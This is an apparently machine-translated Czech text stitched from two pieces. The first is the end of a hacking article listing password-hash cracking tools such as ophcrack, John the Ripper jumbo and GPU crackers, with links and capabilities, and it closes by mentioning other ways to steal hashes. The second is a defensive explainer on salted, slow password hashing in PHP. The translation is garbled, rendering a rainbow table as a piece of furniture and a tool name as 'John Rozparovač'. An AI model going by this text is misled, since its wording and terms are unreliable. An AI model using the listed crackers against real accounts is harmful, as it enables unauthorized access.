insidepro.com/rus/saminside.shtml Snad nejoblíbenější program pro prolomení NTLM hash. Umožňuje importovat přes deset typů dat a používat šest typů útoků k obnově uživatelských hesel Kód brute forcer je napsán výhradně v ASMA, což zajišťuje velmi vysokou rychlost hrubou silou. Je velmi důležité, aby program správně načítal uživatelská jména a hesla Windows v národním kódování znaků.

lm2ntcrack

www.xmco.fr/lm2ntcrack/index.html Malý program, který může pomoci v těžkých časech. Umožňuje vám prolomit NT hash, když je již známé heslo LM. Trik je v tom, že heslo LM nerozlišuje malá a velká písmena, zatímco heslo NT rozlišuje malá a velká písmena a je přesně to, co se používá k jeho kontrole. Pokud tedy víte, že heslo LM je ADMINISTRAT0R, ale nevíte, která písmena jsou velká a která ne, pomůže vám lm2ntcrack.

ighashgpu

www.golubev.com/hashgpu.htm Proces výběru je velmi pracný a časově náročný. Proto, aby se to nějak urychlilo, je vhodné použít prostředky nejvýkonnějšího zařízení v systému - grafické karty. Program ighashgpu vám umožňuje použít GPU k prolomení hashů MD4, MD5, SHA1, NTLM, Oracle 11g, MySQL5, MSSQL. Pokud použijete slovníkový útok, úspěšného výsledku lze dosáhnout mnohem rychleji.

CUDA-Multiforcer

www.cryptohaze.com/multiforcer.php Další nástroj, který využívá sílu grafické karty k prolomení různých hashů. Jak už z názvu tušíte, cílí na grafické karty od nVidie. Podporuje působivý seznam hashů: MD5, NTLM, MD4, SHA1, MSSQL, SHA, MD5 PS: md5($pass.$salt), MD5 SP: md5($salt.$pass), SSHA: base64(sha1($pass.$salt)), DOUBLEMD5: md5(md5($pass)), TRIPLEMD5, LM: Microsoft LanMan hash atd.

ophcrack

Program pro obnovu hesel Windows pomocí duhových tabulek. Takové tabulky obsahují předem vypočítané hashe pro různá hesla ve speciálním formuláři. Když tedy v tabulce najdeme daný hash, rychle získáme hotové heslo. Úspěch přímo závisí na velikosti duhového stolu. Pokud si tedy nechcete heslo násilím vynucovat, doporučuji si stáhnout větší tablet.

John Rozparovač

www.openwall.com Oficiální verze tohoto legendárního hesla brute force nepodporuje prolomení NTLM hash, ale nadšenci si nemohli pomoci a upgradovali funkčnost svého oblíbeného nástroje pro hackování. Byla vydána speciální jumbo oprava, která vám umožňuje hrubou silou použít více než deset dalších typů hashů, včetně NTLM. Offsite má jak rozdíly, které lze použít na původní zdroje, tak i binární soubory připravené k použití (včetně pro win32).

Závěr

To je vlastně všechno. Zvažovali jsme všechny nejběžnější situace. Ve skutečnosti existuje mnohem více způsobů, jak krást (například pomocí snifferu) a používat hash, ale většina z nich se týká metod diskutovaných výše.


Protože většina programátorů nerozumí tomu, jak ochrana heslem pomocí hashování funguje a jak ji správně aplikovat, rozhodl jsem se na toto téma sestavit krátký vysvětlující text.

První věc, kterou je třeba pochopit, je, že ochrana proti hašování je princip „skrýt se na očích“. Předpokládá se, že samotný hash a všechny jeho prvky (samozřejmě kromě hesla) jsou útočníkovi známy. Ale to mu nepomůže. Je to velmi důležité. Je třeba si uvědomit, že účelem hašování není skrýt výsledek hašovací funkce, ale spíše zajistit jeho bezpečnost, i když je hašování kompromitováno.

Další věc, kterou je třeba pochopit, je, že hashování hesel neslouží primárně k ochraně aplikace, ale k ochraně hesel samotných v případě, že by byla aplikace hacknuta. Proto spoléhat se na jakékoli mechanismy v rámci samotné aplikace pro ochranu hesla jde proti samotnému principu hashování. Hash musí být soběstačný – proto byl vynalezen.

Dále si musíte představit, jaké jsou funkce hash hesel. Hlavním problémem hesel je, že jsou relativně krátká. Pokud si při hašování poměrně dlouhého textu můžete [do určité míry] být jisti, že původní text pomocí existujícího hashe nikdo nikdy neuhodne, pak v případě hesla je tato možnost v zásadě možná. A za určitých podmínek je to velmi pravděpodobné.

Jakým typům útoků může být hash hesla náchylný?

1. Hledejte hash pomocí „duhových tabulek“: obrovské databáze, kde se shromažďují předem vypočítané hashe pro všechny možné řetězce.
2. Metoda Bruteforce: iterujte všechny kombinace znaků a aplikujte na ně hashovací funkci, dokud nevrátí požadovaný hash.
3. Vyhledávání ve slovníku. Podobně jako hrubá síla, ale neprohledává všechny možné hodnoty, ale pouze několik tisíc nejoblíbenějších hesel, jako je „123“, „heslo“ atd.

K ochraně proti těmto třem typům útoků jsou zapotřebí různé mechanismy. Tento:

1. K ochraně před vyhledáváním o duhových tabulkách byla vynalezena sůl: řetězec náhodných znaků přidaných k heslu před výpočtem hashe. Heslo tedy prodlužujeme do takového stavu, že žádná duhová tabulka nepojme všechny možnosti.
Nevýhodou soli je, že musí být uložena v čistém textu spolu s heslem. A tím činí heslo zranitelným vůči dvěma dalším typům útoků. Vždy byste si však měli být vědomi toho, že je to záměrné – sůl je určena ke kompromitaci spolu s hashem. A obrana je založena na tom, že sůl je útočníkovi známá.

2. K ochraně před metodami hrubé síly se používá samotný algoritmus a složitost hesla. Vývojáři v poslední době pochopili, že rychlost algoritmu není výhodou, ale nevýhodou, která urychluje vyhledávání. Algoritmus proto musí být tak složitý a pomalý, aby počítal, že hrubá síla ztrácí smysl (zároveň jednorázový výpočet během autorizace uživatele, i když trvá 0,01 sekundy, nijak neovlivní pohodlí uživatele) . Dalším zřejmým požadavkem na algoritmus je jeho kryptografická síla.

3. Slovník brute force (a také v této kategorii můžete psát brute force pro relativně krátká hesla, jejichž výběr bude vyžadovat hrubou sílu relativně malého počtu možností) - nejnepříjemnější útok. Právě kvůli tomu vás některé weby mučí tím, že jsou vybíravé při výběru hesla: „příliš snadné“, „příliš se opakující“ atd. Ale dělají to pro váš prospěch. Složité heslo je potřeba, aby se nedalo uhodnout pomocí slovníku a aby hrubá síla pomocí hashe trvala nepřijatelně dlouho. (Mimochodem, nedělejte si iluze používáním domněle silného hesla jako gfhjkm – slovo „heslo“ v latinském rozložení – hacker také není žádný hlupák a určitě vyzkouší slova ze slovníku v jiném rozložení)

Při dodržení všech tří pravidel si můžeme být jisti, že i když dojde k úniku databáze hesel, nebo k napadení aplikace, nebo dokonce k odcizení počítače, budou hesla v bezpečí. Je třeba si uvědomit, že zanedbání kteréhokoli z těchto tří pravidel způsobí, že hesla budou náchylná k úniku.

U třetího bodu se však nabízí zcela oprávněná námitka – že je pro běžného uživatele obtížné zapamatovat si náhodné heslo. A zde rozhodnutí padá na bedra autora systému – buď povolit slabá hesla s rizikem jejich ztráty, nebo neochotně povolit pouze složitá. Měli byste si však uvědomit, že jakékoli možnosti s šifrováním hesel, odděleným skladováním soli atd., které ospravedlní porušení výše uvedených zásad, jsou paliativní.

Pojďme nyní ke specifikům.

1. Sůl. Nejjednodušší bod: generován automaticky algoritmem z kroku 2
2. Algoritmus. http://www.php.net/manual/ru/book.password.php. Pokud máte fosilní verzi PHP, je zde také odkaz na implementaci na čistém PHP.
3. Heslo. V současné době lze za silné považovat heslo o 12 znacích včetně číslic a písmen různé velikosti nebo heslo skládající se ze 4-5 nepříliš běžných slov.




Horní